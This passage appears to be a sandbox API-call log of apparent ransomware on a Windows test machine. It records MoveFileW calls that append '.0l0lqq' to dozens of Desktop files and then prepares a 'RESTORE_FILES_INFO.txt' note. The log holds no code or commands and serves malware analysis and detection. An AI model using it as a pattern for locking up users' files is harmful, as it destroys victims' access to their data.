HALPmcxz\\Desktop\\4zEr683YnE_zNHNSW.ppt", lpFilePart=0x0) returned 0x3b [0255.940] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4zEr683YnE_zNHNSW.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4zer683yne_znhnsw.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4zEr683YnE_zNHNSW.ppt.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4zer683yne_znhnsw.ppt.0l0lqq")) returned 1 [0255.943] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FFQmUeUF6msEDV z1XJ.mp3", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FFQmUeUF6msEDV z1XJ.mp3", lpFilePart=0x0) returned 0x3d [0255.948] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FFQmUeUF6msEDV z1XJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ffqmueuf6msedv z1xj.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FFQmUeUF6msEDV z1XJ.mp3.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ffqmueuf6msedv z1xj.mp3.0l0lqq")) returned 1 [0255.950] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iocIZfqCKio.mkv", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iocIZfqCKio.mkv", lpFilePart=0x0) returned 0x35 [0255.955] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iocIZfqCKio.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iocizfqckio.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\iocIZfqCKio.mkv.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iocizfqckio.mkv.0l0lqq")) returned 1 [0255.957] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I_Aon.mp4", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I_Aon.mp4", lpFilePart=0x0) returned 0x2f [0255.968] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I_Aon.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i_aon.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I_Aon.mp4.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i_aon.mp4.0l0lqq")) returned 1 [0255.971] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rV_ZTFZi07o.mkv", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rV_ZTFZi07o.mkv", lpFilePart=0x0) returned 0x35 [0255.978] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rV_ZTFZi07o.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rv_ztfzi07o.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rV_ZTFZi07o.mkv.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rv_ztfzi07o.mkv.0l0lqq")) returned 1 [0255.981] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Sig2uoxs6p.mp3", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Sig2uoxs6p.mp3", lpFilePart=0x0) returned 0x34 [0255.988] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Sig2uoxs6p.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sig2uoxs6p.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Sig2uoxs6p.mp3.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sig2uoxs6p.mp3.0l0lqq")) returned 1 [0256.029] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sOG3.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sog3.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sOG3.wav.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sog3.wav.0l0lqq")) returned 1 [0256.035] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tNfxFsbf0vrBLUPU4.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tnfxfsbf0vrblupu4.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tNfxFsbf0vrBLUPU4.wav.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tnfxfsbf0vrblupu4.wav.0l0lqq")) returned 1 [0256.038] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UtrIc8Pfz17ZT.mp3", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UtrIc8Pfz17ZT.mp3", lpFilePart=0x0) returned 0x37 [0256.053] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UtrIc8Pfz17ZT.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\utric8pfz17zt.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\UtrIc8Pfz17ZT.mp3.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\utric8pfz17zt.mp3.0l0lqq")) returned 1 [0256.056] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vT8v.png", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vT8v.png", lpFilePart=0x0) returned 0x2e [0256.063] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vT8v.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vt8v.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vT8v.png.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vt8v.png.0l0lqq")) returned 1 [0256.065] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YET4mR-uQmWWb9o0J.png", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YET4mR-uQmWWb9o0J.png", lpFilePart=0x0) returned 0x3b [0256.076] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YET4mR-uQmWWb9o0J.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yet4mr-uqmwwb9o0j.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YET4mR-uQmWWb9o0J.png.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yet4mr-uqmwwb9o0j.png.0l0lqq")) returned 1 [0256.090] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yNCRUJMIY9rK.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yncrujmiy9rk.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yNCRUJMIY9rK.mkv.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yncrujmiy9rk.mkv.0l0lqq")) returned 1 [0256.094] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_2OJMk3iLu4Kx7Gt.png", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_2OJMk3iLu4Kx7Gt.png", lpFilePart=0x0) returned 0x3a [0256.105] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_2OJMk3iLu4Kx7Gt.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_2ojmk3ilu4kx7gt.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_2OJMk3iLu4Kx7Gt.png.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_2ojmk3ilu4kx7gt.png.0l0lqq")) returned 1 [0256.108] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\CWP8lJD7c.png", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\CWP8lJD7c.png", lpFilePart=0x0) returned 0x47 [0256.119] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\CWP8lJD7c.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\cwp8ljd7c.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\CWP8lJD7c.png.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\cwp8ljd7c.png.0l0lqq")) returned 1 [0256.123] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\ImKMIE3doY3SZ.mkv", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\ImKMIE3doY3SZ.mkv", lpFilePart=0x0) returned 0x4b [0256.131] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\ImKMIE3doY3SZ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\imkmie3doy3sz.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\ImKMIE3doY3SZ.mkv.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\imkmie3doy3sz.mkv.0l0lqq")) returned 1 [0256.134] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\NjWI2eHh1E8.wav", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\NjWI2eHh1E8.wav", lpFilePart=0x0) returned 0x49 [0256.140] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\NjWI2eHh1E8.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\njwi2ehh1e8.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\NjWI2eHh1E8.wav.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\njwi2ehh1e8.wav.0l0lqq")) returned 1 [0256.144] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\P uHu2z.mkv", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\P uHu2z.mkv", lpFilePart=0x0) returned 0x45 [0256.152] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\P uHu2z.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\p uhu2z.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\P uHu2z.mkv.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\p uhu2z.mkv.0l0lqq")) returned 1 [0256.155] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\rq6H7hpp.gif", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\rq6H7hpp.gif", lpFilePart=0x0) returned 0x46 [0256.166] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\rq6H7hpp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\rq6h7hpp.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\rq6H7hpp.gif.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\rq6h7hpp.gif.0l0lqq")) returned 1 [0256.169] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\MR1W6D\\--F_df.mp3", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\MR1W6D\\--F_df.mp3", lpFilePart=0x0) returned 0x4b [0256.177] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\MR1W6D\\--F_df.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\mr1w6d\\--f_df.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\MR1W6D\\--F_df.mp3.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\mr1w6d\\--f_df.mp3.0l0lqq")) returned 1 [0256.186] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\MR1W6D\\oe_MnSyb0v5M.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\mr1w6d\\oe_mnsyb0v5m.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\MR1W6D\\oe_MnSyb0v5M.ppt.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\mr1w6d\\oe_mnsyb0v5m.ppt.0l0lqq")) returned 1 [0256.189] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\MR1W6D\\rM3dTJPknm_FNnC6av.wav", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\MR1W6D\\rM3dTJPknm_FNnC6av.wav", lpFilePart=0x0) returned 0x57 [0256.194] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\MR1W6D\\rM3dTJPknm_FNnC6av.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\mr1w6d\\rm3dtjpknm_fnnc6av.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\MR1W6D\\rM3dTJPknm_FNnC6av.wav.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\mr1w6d\\rm3dtjpknm_fnnc6av.wav.0l0lqq")) returned 1 [0256.196] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\lUTYLZf\\-YxHaqk.gif", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\lUTYLZf\\-YxHaqk.gif", lpFilePart=0x0) returned 0x4d [0256.201] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\lUTYLZf\\-YxHaqk.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\lutylzf\\-yxhaqk.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\lUTYLZf\\-YxHaqk.gif.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\lutylzf\\-yxhaqk.gif.0l0lqq")) returned 1 [0256.204] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\lUTYLZf\\dqq Pil6qdMVA6L.mp3", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\lUTYLZf\\dqq Pil6qdMVA6L.mp3", lpFilePart=0x0) returned 0x55 [0256.213] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\lUTYLZf\\dqq Pil6qdMVA6L.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\lutylzf\\dqq pil6qdmva6l.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\lUTYLZf\\dqq Pil6qdMVA6L.mp3.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\lutylzf\\dqq pil6qdmva6l.mp3.0l0lqq")) returned 1 [0256.216] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\lUTYLZf\\W0tgjl.wav", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\lUTYLZf\\W0tgjl.wav", lpFilePart=0x0) returned 0x4c [0256.225] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\lUTYLZf\\W0tgjl.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\lutylzf\\w0tgjl.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\lUTYLZf\\W0tgjl.wav.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\lutylzf\\w0tgjl.wav.0l0lqq")) returned 1 [0256.240] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\2-KY _4GGse0XC\\1oWKJDPW.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\2-ky _4ggse0xc\\1owkjdpw.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\2-KY _4GGse0XC\\1oWKJDPW.ods.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\2-ky _4ggse0xc\\1owkjdpw.ods.0l0lqq")) returned 1 [0256.244] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\2-KY _4GGse0XC\\L8e ueK1TVgp.mp3", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\2-KY _4GGse0XC\\L8e ueK1TVgp.mp3", lpFilePart=0x0) returned 0x59 [0256.251] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\2-KY _4GGse0XC\\L8e ueK1TVgp.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\2-ky _4ggse0xc\\l8e uek1tvgp.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\2-KY _4GGse0XC\\L8e ueK1TVgp.mp3.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\2-ky _4ggse0xc\\l8e uek1tvgp.mp3.0l0lqq")) returned 1 [0256.254] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\2-KY _4GGse0XC\\oBnpqMnRL.avi", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\2-KY _4GGse0XC\\oBnpqMnRL.avi", lpFilePart=0x0) returned 0x56 [0256.262] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\2-KY _4GGse0XC\\oBnpqMnRL.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\2-ky _4ggse0xc\\obnpqmnrl.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\2-KY _4GGse0XC\\oBnpqMnRL.avi.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\2-ky _4ggse0xc\\obnpqmnrl.avi.0l0lqq")) returned 1 [0256.263] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\2-KY _4GGse0XC\\PPBNbyXE13VNEyDI.wav", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\2-KY _4GGse0XC\\PPBNbyXE13VNEyDI.wav", lpFilePart=0x0) returned 0x5d [0256.271] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\2-KY _4GGse0XC\\PPBNbyXE13VNEyDI.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\2-ky _4ggse0xc\\ppbnbyxe13vneydi.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\2-KY _4GGse0XC\\PPBNbyXE13VNEyDI.wav.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\2-ky _4ggse0xc\\ppbnbyxe13vneydi.wav.0l0lqq")) returned 1 [0256.272] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\2-KY _4GGse0XC\\VGIJJpLjrfOQDM9n i.avi", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\2-KY _4GGse0XC\\VGIJJpLjrfOQDM9n i.avi", lpFilePart=0x0) returned 0x5f [0256.277] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\2-KY _4GGse0XC\\VGIJJpLjrfOQDM9n i.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\2-ky _4ggse0xc\\vgijjpljrfoqdm9n i.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eOE4K9s0r_66LjjhmKw\\2-KY _4GGse0XC\\VGIJJpLjrfOQDM9n i.avi.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\eoe4k9s0r_66ljjhmkw\\2-ky _4ggse0xc\\vgijjpljrfoqdm9n i.avi.0l0lqq")) returned 1 [0256.288] SysStringLen (param_1="亇略鄮껖돧␋睹ᵓꟜ짖ꄇ겼?﹵?뗧鴘ထ䥹럅?ꁅ龁鳁擑蚺嬁^鱤岨") returned 0x20 [0256.288] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.289] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.289] CoTaskMemFree (pv=0x720748) [0256.289] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0256.289] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", nBufferLength=0x105, lpBuffer=0x26e4fc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\RESTORE_FILES_INFO.txt", lpFilePart=0x0) returned 0x3c [0256.289] CoTaskMemAlloc (cb=0x20c) returned 0x720748 [0256.289] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x720748 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0256.289] CoTaskMemFree (pv=0x720748) [0256.289] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x26e468, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", 